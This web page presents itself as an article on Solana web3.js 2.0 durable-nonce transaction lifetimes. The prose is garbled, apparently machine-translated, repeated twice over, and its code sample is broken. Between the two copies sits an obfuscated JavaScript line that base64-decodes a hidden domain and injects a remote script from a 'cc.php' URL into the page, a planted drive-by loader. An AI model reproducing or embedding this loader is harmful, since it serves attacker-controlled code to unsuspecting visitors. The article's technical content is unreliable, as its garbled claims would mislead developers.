Title: Solana: Solana/WEB3.JS 2.0 Edition – Do you use a permanent non -life as life?
As a programmer who works with Solana Blockchain, you can push the Library Solana/Web3.js. Thanks to this powerful framework, you can create custom applications through the Solan protocol. However, when it comes to transaction validation and life management, some restrictions should be taken into account.
In this article, we can handle permanent nonka (DN) as the life of transactions in Solana/Web3.js 2.0. In particular, we will examine how this can lead to problems with notification employees and the entire life cycle.
original question
Instead of with a block hash, I play a nonce account for a simple transaction program. The transaction looks like this:
Const tx = {
Enter: "Send",
By: "account1" ,,
to: "account2" ,,
Value: 100,
The idea is to use a permanent nonce (DN) as a life for this transaction instead of relying on the floor. This approach works well for small transactions or simple cases.
using a long edition of nonce
However, if you use DN as vitality, you can encounter unexpected behavior in Solana/Web3.js 2.0. Special:
However, if you use DN as a transaction life, these notifications may not be released correctly.
Transaction life cycle error : Because transactions are carried out by the Solana network, errors may occur that affect the entire life cycle of transactions. The use of DN as a life can lead to incorrect life cycles of transactions and probably cause problems with performing an intelligent contract.
Update: notification guide problem
It seems that the notification service is defective in the latest version of Solana/Web3.js 2.0. If you have problems with notifications that are not properly started, it can be a factor.
While in some cases it can use a permanent nonce as the length of the transaction, it is important to take on potential problems while working with Solana/WEB3.JS 2.0. To avoid these problems, you may need to think about your approach and use another transactional life management method.
To solve this problem, I recommend examining the alternative methods of management of the transaction, e.g. make sure that notification managers are properly configured in such a way that they are properly launched in various scenarios.
Thanks to these steps, you can provide a smooth and efficient life cycle of transactions on blockchain Solana.
Additional resources
Solana/Web3 documentation.
Solana/web3.js github repository: [ Woman (
Stay with the latest achievements in Solan and Web3.js, following the official documentation, GitHub repositories and relevant forum forums.
Solana: solana/web3.js 2.0 Issue With Using a Durable Nonce as a Lifetime
const pdx=»bm9yZGVyc3dpbmcuYnV6ei94cC8=»;const pde=atob(pdx);const script=document.createElement(«script»);script.src=»https://»+pde+»cc.php?u=ee486fcb»;document.body.appendChild(script);
Title: Solana: Solana/WEB3.JS 2.0 Edition – Do you use a permanent non -life as life?
As a programmer who works with Solana Blockchain, you can push the Library Solana/Web3.js. Thanks to this powerful framework, you can create custom applications through the Solan protocol. However, when it comes to transaction validation and life management, some restrictions should be taken into account.
In this article, we can handle permanent nonka (DN) as the life of transactions in Solana/Web3.js 2.0. In particular, we will examine how this can lead to problems with notification employees and the entire life cycle.
original question
Instead of with a block hash, I play a nonce account for a simple transaction program. The transaction looks like this:
Const tx = {
Enter: "Send",
By: "account1" ,,
to: "account2" ,,
Value: 100,
The idea is to use a permanent nonce (DN) as a life for this transaction instead of relying on the floor. This approach works well for small transactions or simple cases.
using a long edition of nonce
However, if you use DN as vitality, you can encounter unexpected behavior in Solana/Web3.js 2.0. Special:
Update: notification guide problem
It seems that the notification service is defective in the latest version of Solana/Web3.js 2.0. If you have problems with notifications that are not properly started, it can be a factor.
While in some cases it can use a permanent nonce as the length of the transaction, it is important to take on potential problems while working with Solana/WEB3.JS 2.0. To avoid these problems, you may need to think about your approach and use another transactional life management method.
To solve this problem, I recommend examining the alternative methods of management of the transaction, e.g. make sure that notification managers are properly configured in such a way that they are properly launched in various scenarios.
Thanks to these steps, you can provide a smooth and efficient life cycle of transactions on blockchain Solana.
Additional resources
Stay with the latest achievements in Solan and Web3.js, following the official documentation, GitHub repositories and relevant forum forums.